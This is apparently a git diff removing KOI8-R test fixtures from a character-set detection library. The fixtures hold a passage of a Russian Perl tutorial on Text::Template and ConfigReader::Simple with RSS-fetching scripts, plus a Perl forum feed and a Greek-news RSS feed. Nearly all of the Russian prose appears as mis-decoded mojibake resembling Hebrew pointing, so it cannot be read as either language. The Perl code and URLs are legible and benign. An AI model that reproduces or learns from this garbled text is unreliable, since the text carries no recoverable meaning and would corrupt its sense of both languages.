/>םִֿױּ״ Text::Template ֽֿײֵװ ׀ֹׂ־ֱֹֽװ״ ֱִ־־ֵ ֱֻֻ ֵָ. כְֹּ ֱֵָ ׃װֱ־ֿ׳ׁװ׃ׁ ֵֹֽ־ֱֹֽ ׀ֵֵֵֽׂ־־ָ ׳ ֱֲּֿ־ֵ, ֱ ־ֱֵ־ֹׁ - ־ֱֵ־ֹֹֽׁ ׀ֵֵֵֽׂ־־ָ ֱֲּֿ־ֱ, ֱ װֱֻײֵ ֿ׀ְִֵֵּׁׂװ װֹ׀ ׀ֵֵֵֽׂ־־ָ. ו׃ֹּ ־ֱֵ־ֵֹ ֱֵָ ׀ֿׂ׃װֿ ׃ֱֻּׁׂ, ׀ֵֵֵֽׂ־־ֱׁ ֱֲּֿ־ֱ ׃ֱֻּׁׂ. ו׃ֹּ ־ֱֵ־ֵֹ ֱֵָ - ֱ־ֿ־ֹֽ־ ֱֽ׃׃ֹ׳, ׀ֵֵֵֽׂ־־ֱׁ ֱֲּֿ־ֱ - ֱֽ׃׃ֹ׳, ֹ װֱֻ ֱִֵֵּ.<br /><br />ןֲֵֻװ, ׃ֱִֿ׳ֱֵֽ XML::RSS - ֱ־ֿ־ֹֽ־ ֵָ. םִֿױּ״ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ֱֲ׃װֱֻׂװ־ ֹ־װֵֵֶׂ׃ ִּׁ ׃ֱִֿ־ֹׁ, ־ֿ ־ֵ ִּׁ ִֿ׃װױ׀ֱ. װֿ ֿװֱ׃װֹ ֵֹֽ־־ֿ װֿ, װֿ ׁ ִּֿײֵ־ ׀ֱִֵֵׂװ״ ֵֽֽֿױ ֱֲּֿ־ױ. ק ֱֲּֿ־ֵ <span style="font-weight:bold">$rss-&gt;channel</span>, ֻֿװֱֿׁׂ ׳ ֱֵֻ׃װ׳ֵ ־ֱֵ־ֹׁ ׃ִֵֿׂײֹװ ֱ־ֿ־ֹֽ־ ֵָ, ׃װֱ־ֿ׳ֹװ׃ׁ <span style="font-weight:bold">%channel</span>, ֱ <span style="font-weight:bold">$rss-&gt;items</span>, ׃ִֵֿׂײֱֱׁ ֱ־ֿ־ֹֽ־ ֱֽ׃׃ֹ׳ ׃װֱ־ֿ׳ֹװ׃ׁ <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 2: י׃׀ּֿ״ֿ׳ֱ־ֵֹ ֱֲּֿ־ֱ.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />ק־ױװֹׂ ֱֲּֿ־ֱ Text::Template ֹ׃׀ּֿ־ֵׁװ ֲֹֻּֿ ֱִֻֿ, ֻֿװֵֿׂ ֿ־ ־ֱִָֹֿװ ֵֽײִױ ֶַֹױׂ־ֹֽ ׃ֱֲֹֻֻֽֿ. ן־ ֱֵֽ־ֵׁװ ֲֻּֿ ׀ֿ׃ִֵּ־ֹֽ ׳ֹ׃ֵּ־־ֽ ׳ֱׂײֵ־ֵֹֽ. יֵֽ־ֱ ׀ֵֵֵֽׂ־־ָ - ְֹֻּ ֱֵָ, ׃׃ֻּױ ־ֱ ֻֿװֿׂ ׁ ׀ֱִֵֵּׂ ׳ ֱֵֻ׃װ׳ֵ ֱַׂױֵֽ־װֱ ֶױ־ֳֹֹֻ fill_in_file() ׳ ִֵֻֿ, ׀ֹׂ׳ִֵֵ־־ֽֿ ׳ <span style="font-style:italic">ֹּ׃װֹ־ֵַ 2</span>.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 3: HTML ֱֲּֿ־.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br />כֱֻ װּֿ״ֻֿ ׃ֹ׃װֱֵֽ ֱֲּֿ־ֿ׳ ֱִֵ׃װֿ׳ֱ־ֱ, ׁ ַֽֿױ ֵֽ־ׁװ״ ׀ִֵׂ׃װֱ׳ֵּ־ֵֹ ־ֵ ֵֽ־ׁׁ ַֹֻּֿױ ֱִֻֿ. ו׃ֹּ ׁ ׀ֹֽׂױ ֵֵׂ־ֵֹ ֵֹֽ־ֹװ״ ׳ִֹ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ ֱִ־־ָ, ׁ ׀ֵֽֿ־ְׁ װּֿ״ֻֿ ֱֲּֿ־. ו׃ֹּ ֽ־ֵ ׳ֵֽ׃װֿ HTML װֲֵׂױֵװ׃ׁ ׀ֿׂ׃װֿ װֵֻ׃װ, ׁ װּֿ״ֻֿ ֵֹֽ־ְ ׀ִֿ ־ֿ׳ ֱֶֽֿׂװ ֱֲּֿ־, ֱֻֻ װֿ ׃ֱִֵּ־ֿ ׳ <span style="font-style:italic">ֹּ׃װֹ־ֵַ 4</span>.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 4: ֱֲּֿ־ ִּׁ ֲֿ־ַֿֿ װֵֻ׃װֱ.</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. ןװִֵֵּ־ֵֹ ֻֿ־ֶַֹױֱֳֹֹׂ.</span><br /><br />טֹֿֿׂ ֱִֹ־ װֱֻײֵ ׀ֿ׳ֵּֿׁװ ֱֱִ׀װֹֿׂ׳ֱװ״ ׃ֹֻׂ׀װ ֻ ֱֹּׂ־ֽֿױ ֻֿׂױײֵ־ְֹ. ק <span style="font-style:italic">ֹּ׃װֹ־ֵַ 1</span> ׁ ײֵ׃װֻֿ ׀ֿׂ׀ֹ׃ֱּ ־ֱֵ־ֵֹ ִֵֹֻׂװֹֹֿׂ ִּׁ ׳׳ֱִֿ, װֿ ֱִֵֵּװ ֽֿ ׃ֹֻׂ׀װ ָׂױ׀ֹֻֽ - ֵ׃ֹּ ֽֿׁ ֱִֽֿ־ׁׁ ִֵֹֻׂװֹֿׁׂ ׀ֵֽֿ־ֵׁװ׃ׁ, ׃ֹֻׂ׀װ ׃ֱֵּֽֿװ׃ׁ. כֵֽֿׂ װַֿֿ <span style="font-style:italic">׳ ֹּ׃װֹ־ֵַ 2</span> ײֵ׃װֻֿ ׀ֿׂ׀ֹ׃ֱ־ֿ ֹֽׁ ֱֲּֿ־ֱ, ־ֵ׃ֽֿװׁׂ ־ֱ װֿ װֿ ׁ ַֽֿױ ֵֽ־ׁװ״ ׀ִֵׂ׃װֱ׳ֵּ־ֵֹ, ֵֹֽ־ׁׁ ֱֲּֿ־. ם־ֵ ־ױײ־ֿ ֵֹֽװ״ ׳ֽֿֿײ־ֿ׃װ״ ֱִ׳ֱװ״ ֱֻײִֽֿױ ֱֲּֿ־ױ ׃ִֵֿׂײֱװֵּ״־ֵֿ ֹֽׁ ׳ֵֽ׃װֿ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ִֿ־ַֿֿ ֹ װַֿֿ ײֵ ֵֹֽ־ֹ ִּׁ ֱׂ־ַֿֿ ׃ִֵֿׂײַֹֽֿֿ.<br /><br />ם־ֵַֹֿ ׃׳ֲִֿֿ־ֿ-ִֿ׃װױ׀־ֵ ׃ֹֻׂ׀װ, ֻֿװֵֿׂ ׁ ־ֱֵּ ׳ י־װֵׂ־ֵװ װֲֵׂױְװ, װֲֿ ׀ּֿ״ֿ׳ֱװֵּ״ ֿװֱִֵֻׂװֹֿׂ׳ֱּ ׳ֵָׂ־ְְ ֱ׃װ״ ׃ֹֻׂ׀װֱ ֹֹּ ׳ְֱֵֻּֽױְ ֲֲֹֹּֿװֵֻױ, ֻֿװֱֿׁׂ ׃ִֵֿׂײֹװ װּֿ״ֻֿ ֻֿ־ֶַֹױֱֳֹֿׂ־־ֵ ֱִ־־ֵ. פֱֻֿ ׀ִִָֿֿ װֲֵׂױֵװ, װֲֿ ֻֿ־ֵ־ ׀ּֿ״ֿ׳ֱװֵּ״ ־ֱּ ֿ׃־ֿ׳ ֱֻׁ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ֹׁ ֹ ׀ֱׂ׳ֹּ ׃ֹֻׂ׀װ - ֱֲֹֻֿ ׃ֱֵּֽֿװ ׃ֹֻׂ׀װ. נֵָֹּֿ ֻֿ־ֶַֹױֱֳֹֿׂ־־ֵ ֱִ־־ֵ ַֽֿױװ ׀ֹׂ׳ֵ׃װֹ ֻ ־ֵֿײֱִֹ־־ֽ ֵׂױּ״װֱװֱֽ, ־ֿ ֿ־ֹ ־ֵ ׀ְֱּֽֿֿװ ׀ֱַֽֽֿׂׂױ.<br /><br />ס ַֽֿױ ױֱֱֻװ״ װֵֻױֵֹ ֻֿ־ֶַֹױֱֳֹֿׂ־־ֵ ֱִ־־ֵ ־ֵ׃ֻּֿ״ֹֹֻֽ ׃׀ֿ׃ֱֲֹֽֿ ֹ ׀ֱֻֿײױ װּֿ״ֻֿ ִֹֿ־ ֹ ־ָֹ. בָֹׂ׳ Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> ׃ִֵֿׂײֹװ ־ֵ׃ֻּֿ״ֻֿ ִֽֿױֵּ ִּׁ ֱֱֲֿׂׂ ֻֿ־ֶַֹױֱֳֹֿׂ־־ָ ֱֶּֿ׳ ׳ ֱֹּׂ־ָ ֱֶֽֿׂװֱָ ֹֹּ ֱַׂױֵֽ־װֿ׳ ֱֻֽֿ־ִ־ֿ ׃װֹֻֿׂ. הֱֹ־ֵׂ ִּֿײ־ ׳ֱֲֹׂװ״ ׀ִִָֿֿ, ֻֿװֿׂ ױִֿ׳ֵּװ׳ֵֿׁׂװ ָֹ ־ױײֱִֽ.<br /><br />כֱִַֿ ׁ ׳׀ֵׂ׳ֵ ־ֱֱּ ֿװִֵּׁװ״ ֱִ־־ֵ ֻֿ־ֶַֹױֱֳֹֹׂ ֿװ ָֹֽֿ ׃ֹֻׂ׀װֿ׳, ׁ ׀ֱֲֵֵּׂׂ ־ֵ׃ֻּֿ״ֻֿ ִֽֿױֵּ ־ֱ CPAN ֹ ֿ׃װֱ־ֿ׳ֹּ׃ׁ ־ֱ ConfigReader::Simple, ֻֿװֿׂ ֹ׃׀ּֿ״ױֵװ ׀ֿ׃װֿׂ־ ֱֶֽֿׂװ ְֻּ-־ֱֵ־ֵֹ. ס ֹ׃׀ּֿ״ֿ׳ֱּ ֵַֿ ־ֱ׃װּֿ״ֻֿ ֱ׃װֿ, װֿ ־ֱֱּ ֿװ׀ֱׂ׳ּׁװ״ ֹֽֿ ֵֹֽ־ֵ־ֹׁ גֵֻױ ןֲֵֹׂ־ױ (Bek Oberin), ֱ׳װֿׂױ ַֹֹֿׂ־ֱּ״־ֿ ׳ֵׂ׃ֹֹ, ֱװֵֽ ׀ּֿ־ֿ׃װ״ְ ׳ּׁ ־ֱ ׃ֲֵׁ ׀ִִֵֿׂײֻױ ִֽֿױּׁ.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 5</span> ֱֱִ׀װֹׂױֵװ <span style="font-style:italic">ֹּ׃װֹ־ַ 2</span> ֻ ֹ׃׀ּֿ״ֿ׳ֱ־ְֹ ConfigReader::Simple. ס ׃ְֱִֿ ־ֿ׳ ֲֵֻֿװ ֻֿ־ֶַֹױֱֳֹֹׂ, ֱװֵֽ ֹװְֱ ־ֱֵ־ֹׁ ֹ ֲֵֻֿװֱ. םִֿױּ״ ׀ֱֲֵֿׂׂױֵװ ֵֹֽ־ֱ ְֵֻּ ֻֿ־ֶַֹױֱֳֹֹׂ ׳ ֵֹֽ־ֱ ֵֽװִֿֿ׳ ִּׁ ׀ֿׂ׃װַֿֿ ִֿ׃װױ׀ֱ (ָֿװׁ ִּׁ ִֿ׃װױ׀ֱ ֻ ־ֱֵ־ֹֽׁ ְֵֻּ ׃ ֻֿװֵֹ׃ֹֹֻֽ ֵֹֽ־ֱֹֽ, ֻֿװֵֿׂ ־ֵ ַֽֿױװ ֲװ״ ׀ֱֲֵֿֿׂׂ׳ֱ־ ׳ ִֵֹ־װֱֶֹֹֻװֿׂ Perl ׀ִָֹֹֿׂװ׃ׁ ֹ׃׀ּֿ״ֿ׳ֱװ״ ֵֽװִֿ get()). <span style="font-style:italic">לֹ׃װֹ־ַ 6</span> ׃ִֵֿׂײֹװ ֻֿ־ֶַֹױֱֳֹֿׂ־־ ֱֶּ.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 5: י׃׀ּֿ״ֿ׳ֱ־ֵֹ ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">לֹ׃װֹ־ַ 6: זֱּ ֻֿ־ֶַֹױֱֳֹֹׂ.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. תְֱֵֻּ־ֵֹ.</span><br /><br />ס ַֽֿױ ױֵֽ־״ֹװ״ ֱֵֽׂׂ ָֹֽֿ ׀ֱַֽֽֿׂׂ, ֿװִֵּׁׁ ִֻֿ ֿװ ַֹֹֻּֿ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ ֹ ֻֿ־ֶַֹױֱֳֹֿׂ־־ֿ ֹ־ֱֳֶֹֹֽֿׂ. װֿ ֱִֵֵּׂ־ֵֹ ֱִֵֵּװ ׀ֱַֽֽֿׂׂױ ֲֵֵּֿ ֲַֹֻֿ ֹ ׀ֿׂ׃װֿ ׳ ֱֱִ׀װֱֳֹֹ ֻ ־ֿ׳ֽ ֻֿׂױײֵ־ֹֽׁ. ֱֲּֿ־ ׀ֿ׳ְּֿׁװ ֵֹֽ־ׁװ״ ׳׳ִֿ, ֱ ֻֿ־ֶַֹױֱֳֹֿׂ־־ֵ ֱֶּ ױ׀ֱׂ׳ּׁװ״ ֱֲֿׂװֿ ׀ֱַֽֽֿׂׂ ֲֵ ֵֹֽ־ֵ־ֹׁ ֱִֻֿ. Text::Template ֹ ConfigReader::Simple ְֱִֵּװ װֿ ־ֱ׃װּֿ״ֻֿ ׀ֿׂ׃װֽ, ־ֱ׃ֻּֿ״ֻֿ ׳ֽֿֿײ־ֿ.<br /><br /><span style="font-weight:bold">5. ף׃ֹֻּ</span><br /><br />ק׃ֵ ִֽֿױֹּ, ױ׀ֹֽֿ־ֱֵֵֽ ׳ װֿ ׃װֱװ״ֵ, ֽֿײ־ֿ ־ֱװֹ ־ֱ Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ןֲ ֱ׳װֵֿׂ.</span><br /><br />גֱֱׂ־ ִֵ זֿ (brian d foy) - ֱִֹװֵּ״ <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">נֱֵֹֽׂ־ֹׁ.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">ַֹֹֿׂ־ֱּ ׃װֱװ״ֹ ־ֱ Perl Review (PDF)</a> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - הׂױֵַֹ װֵֽ, ׃׳ֱׁ־־ֵ ׃ ֱֲּֿ־ֱֹֽ ֹ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/KOI8-R/forum.template-toolkit.ru.9.xml b/chardet/tests/KOI8-R/forum.template-toolkit.ru.9.xml deleted file mode 100644 index 76b7677..0000000 --- a/chardet/tests/KOI8-R/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - זֿׂױֽ Template Toolkit : סֻ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ֹׁ Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - ֲ׃װֱׁׂ, ֽֿ־ֱׁ ֹ ֱׂ׃ֱֵֹֽׁׁׂ ׃ֹ׃װֱֵֽ ֱֲֲֿֿׂװֹֻ ֱֲּֿ־ֿ׳. מֱ ׃ֱװֵ ֱֲֿׂװֱֵװ ֶֿׂױֽ, ׳ ֻֿװֽֿֿׂ ֲֿ׃ױײְֱִװ׃ׁ ׳ֿ׀ֿׂ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֲֲֹֹּֿװֵֹֻ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ. פֵֽ, ׃׳ֱׁ־־ֵ ׃ ׀ֱַֹֽֽֿֿׂׂׂ׳ֱ־ֵֹֽ ׳ Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ֱֲּֿ־ ׳ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - גֵ׃׀ֱּװ־ Perl-ֱִֵֻׂװֿׂ - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - גֵ׃׀ֱּװ־ Perl-ֱִֵֻׂװֿׂ ִּׁ Windows ׃ ֽ־ֿײֵ׃װ׳ֵ־־ֹֽ ֹ־׃װׂױֵֽ־װֱֹֽ ֿװֱִֹֻּ ׃ֹֻׂ׀װֿ׳.<br /> -<br /> -URL ֱַׂױֹֻ: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -הֱֽֿ־ׁׁ ׃װֱׂ־ֱֳֹ: <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - הׂױֵַֹ װֵֽ, ׃׳ֱׁ־־ֵ ׃ ֱֲּֿ־ֱֹֽ ֹ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - הׂױֵַֹ װֵֽ, ׃׳ֱׁ־־ֵ ׃ ֱֲּֿ־ֱֹֽ ֹ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/KOI8-R/greek.ru.xml b/chardet/tests/KOI8-R/greek.ru.xml deleted file mode 100644 index 3716a5b..0000000 --- a/chardet/tests/KOI8-R/greek.ru.xml +++ /dev/null @@ -1,85 +0,0 @@ - - - - - - Greek.Ru - נֿװֹ ׳׃ֵ ֿ ֵֵַׂ׃ֻֽֿ ־ֱ ׂױ׃׃ֻֽֿ. חֳֵֹׁׂ. כֹ׀ׂ - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - חֳֵֹׁׂ ׃ִֵַֿ־ׁ: בזימש גןעספףס ף נעןףפיפץדיוך - http://www.greek.ru/ru/news/news_detail.php?ID=994 - קֱּ׃װֹ בֶֹ־ ־ֱֱֹּ ֱֻֽ׀ֱ־ְֹ "׀ֿ ֱַֿׂ־ֵֹ־ְֹ ׀ֿׂ׃װֹװױֳֹֹ ֹ ־ֱֵֻֿ־־ֿ ֱֻװֹ׳־ֿ׃װֹ ֹ־ִױ׃װֹֹׂ ׃ֵֻ׃ֱ". - - - - חֳֵֹׁׂ ׃ִֵַֿ־ׁ: ק חֳֵֹֹׂ ֱֵׂ׃װֿ׳ֱ־ ֵװ׳ֵֿׂ ֲֹׂװֱ־ֳֵ׳ ֱ ֲֵֹֹ־ֵֹ ׳ֱִֵּּ״ֱֳ ִֿ־ַֿֿ ֹ ֱֱַֹֽ־ֿ׳ - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ק חֳֵֹֹׂ ֱֵׂ׃װֿ׳ֱ־ ֵװ׳ֵֿׂ ֲֹׂװֱ־ֳֵ׳ - ׳׃ֵ ֵּ־ ִֿ־ֿ ׃ֵֽ״ֹ, ֻֿװֵֿׂ ׃ֹּ״־ֿ ֲֹֹֹּ ׳ֱִֵּּ״ֱֳ ־ֲֵּֿ״ַֿֿ ֱֱַֹֽ־ֱֹֻ ֲֹּ "װױֹׂ׃װֵֹ׃ֻֿ םֵֹֻֻ" - ֱֶֹ־׃ַֻֿֿ בֻֿׂ׀ּֿׁ. - - - - - כֹ׀ׂ ׃ִֵַֿ־ׁ: פױֹֻׂ-ֹֻ׀ֹֿׂװ ׀ְֱֱִֵַּׂװ ֿ׃׳ֲִֹֿֿװ״ כֹ׀ׂ ֿװ ֹֽ־ - http://www.greek.ru/ru/news/news_detail.php?ID=990 - לִֵֹׂ װױֻֿׂ-ֹֻ׀ֹֿׂװֿ׳ עֱױֶ הֵ־ֻװֱ ׳׃ֱֱֻּ׃ׁ ֱ ֹֻּ׳ְֱֳִֹֹ ֹֽ־־ָ ׀ֵּֿ ׳ִּֿ״ ֱֱֳִֵֹֻֽֿׂ־־ֿ ֹּ־ֹֹ, ְֱִֵֵּׁׂ ֿ׃װֿׂ׳ ־ֱ ֵֵַׂ׃ֻױְ ֹ װױֳֵֻׂױְ ֱ׃װֹ. - - - - - כֹ׀ׂ ׃ִֵַֿ־ׁ: בפפילב מבמוף ץהבע נן כינעץ 29 לופ מבתבה - http://www.greek.ru/ru/news/news_detail.php?ID=952 - עֵ׃׀ױֱֲֹֻּ כֹ׀ׂ ֹ ׳ֵ׃״ ֵֵַׂ׃ֹֻ ֹֽׂ ֿװֵֽװֹֹּ 20 ְֹּׁ װֱׂױׂ־ױְ ֱִװױ ׃׳ֵֿ ֹ׃װֹֹֿׂ. עֿ׳־ֿ 29 ֵּװ ־ֱֱִ ׳ ִֵָֿ ֿ׀ֱֳֵֹֹׂ «בװװֱֹּ» ־ֱ ֿ׃װֿׂ׳ ׳׃ֱִֹֹּ׃״ װױֳֵֵֹֻׂ ׳ֿ׃ֱֻ, װֿ ׀ֹׂ׳ֵּֿ ֻ ֱֽ׃׃ֿ׳ֿ ֲֵַֹֹּ ־ֱ׃ֵֵּ־ֹׁ ֹ ֻֻֿױ׀ֱֳֹֹ ׃ֵ׳ֵׂ־ֿ ֱ׃װֹ כֹ׀ֱׂ. - - - - - ףֲֿװֹׁ. ף׀ֵֻװֱֹֻּ. ק׃װֱ׳ֹֻ: ק׃װֱ׳ֱֻ «םֿׂ׃ֵֹֻ ׀ױװֹ…ןװ ףִֹֿ־ֱ ִֿ טױּ׳. קֱֹֽֿ׃׳ֹׁ ־ֱִֿֿׂ׳ ףִֵֵֹֽׂ־ֽֿֿׂ״ׁ ׳ 16 - 6 ׳.׳. ִֿ ־. .» - http://www.greek.ru/ru/news/news_detail.php?ID=983 - ק ֱֱָֻֽׂ כױּ״װױׂ־ֿ ןֹּֽ׀ֱִֹ ׳ בֶֹ־ֱָ, ׳ םױֵֵ כֱִֹֻּ׃ַֻֿֿ י׃ֻױ׃׃װ׳ֱ ׃ 3.06.03 ׀ֿ 28.10.03 ׀ִָֹֿֿׂװ װֱ ׳׃װֱ׳ֱֻ. - - - - - ףֲֿװֹׁ. ף׀ֵֻװֱֹֻּ. ק׃װֱ׳ֹֻ: ןפםופיל 95-לופיו חעו‏וףכיך היעיצוע - http://www.greek.ru/ru/news/news_detail.php?ID=979 - ק ְֵֹּ 2003 ֱִַֿ ֹ׃׀ּֿ־ֵׁװ׃ׁ 95 ֵּװ ןִֹ׃׃ְֵ הֹֹֽװֱִֹֹׂ - ֻֽֿ׀ֹֿװֿׂױ, ִֹֹׂײֵׂױ, ־ֱִֿׂ־ֽֿױ ֱׂװֹ׃װױ ףףףע. וַֿ ָֿֿֿׂ ׀ֽֿ־ׁװ ֹ ְֲּׁװ ׳ גּֿ״ֽֿ װֱֵװֵׂ, ִֵַ ֿ־ ֱֲֿׂװֱּ ׃ 1968 ֱִַֿ. - - - - - נױװֵֵ׃װ׳ֹׁ ֹ װױֹֽׂ: נֿׂ עִֿֿ׃ - http://www.greek.ru/ru/greece/impression/detail.php?ID=986 - מֱִַֹֻֿ ֵֵ ׃ּֿ־ֳֵ ־ֵ ׀ִֿ־ֱֹּֽֿ׃״ װֱֻ ׳׃ֻֿֿ ־ֱִ װֹֽ ֿ׃װֿׂ׳ֽֿ. ן־ֿ ֲֿ־ֱֹּֽֿ ׃׳ֹֹֽֿ ־ֵײ־ֹֽ ׂױֱֹֻֽ ֻׂױ ֱֻײִַֿֿ ֱִֽֿ, ֱֻײִ ֹּ׃װֵֻֿ, ֱֻײִױְ ֱֻ׀ֵּ״ֻױ ׳ִֿ ׳ ׃ֵּֿ־ֽֿ ֵֽֿׂ. P.S. װֱ ׃ֱֱֻֻ ׀ֿ׃׳ֱֵׁװ׃ׁ ׃ֱֽֽֿױ ׃ֱֻֿ־ֽֿױ ֵֽ׃װױ ׳ ֵֹֽׂ – ֿ׃װֿׂ׳ױ עִֿֿ׃ :))) - - - - - ןֹּֽ׀ֹ׃ֵֹֻ ַֹׂ 2004: לֵװ־ׁׁ ןֹּֽ׀ֱֱִֹ-2004 ׀ֵׂװֵ־ִױֵװ ־ֱ ִֵֻֿׂׂ - http://www.greek.ru/ru/news/news_detail.php?ID=958 - ק ֵּװ־ֵ ןֹּֽ׀ֱִֵֹ-2004, ֻֿװֱֿׁׂ ׀ִֵֿׂװ ׳ בֶֹ־ֱָ, ֲױִױװ ױֱ׃װ׳ֿ׳ֱװ״ ׃׀ֿׂװ׃ֵֽ־ ֹ 201 ׃װֱׂ־. - - - - - י׃װֹֿׁׂ. כױּ״װױֱׂ. סֻ. םױֱֻ: גץגץלימב: עץףףכיך בהםיעבל - http://www.greek.ru/ru/news/news_detail.php?ID=991 - קֿ ׳׃ֵֽ ֵֹֽׂ ֵ׃װ״ װּֿ״ֻֿ ִֿ־ֱ ײֵ־ֹ־ֱ-ֱֱִֹּֽׂ. נֵֹֽׂ, ֱֱִֹּֽׂ עֿ׃׃ֹ׃ַֻֿֿ ֶּֿװֱ. י ֿ־ֱ – ֱֵַׂ־ֱֻ, לֱ׃ֱֹֻׂ־ֱ גױֲױֹּ־ֱ, ֵַֹֿׂ־ׁ ֿ׃׳ֲִֹֿֿװֵּ״־ֿ ֲֿׂ״ֲ ֵֵַׂ׃ַֻֿֿ ־ֱֱִֿׂ ׃ 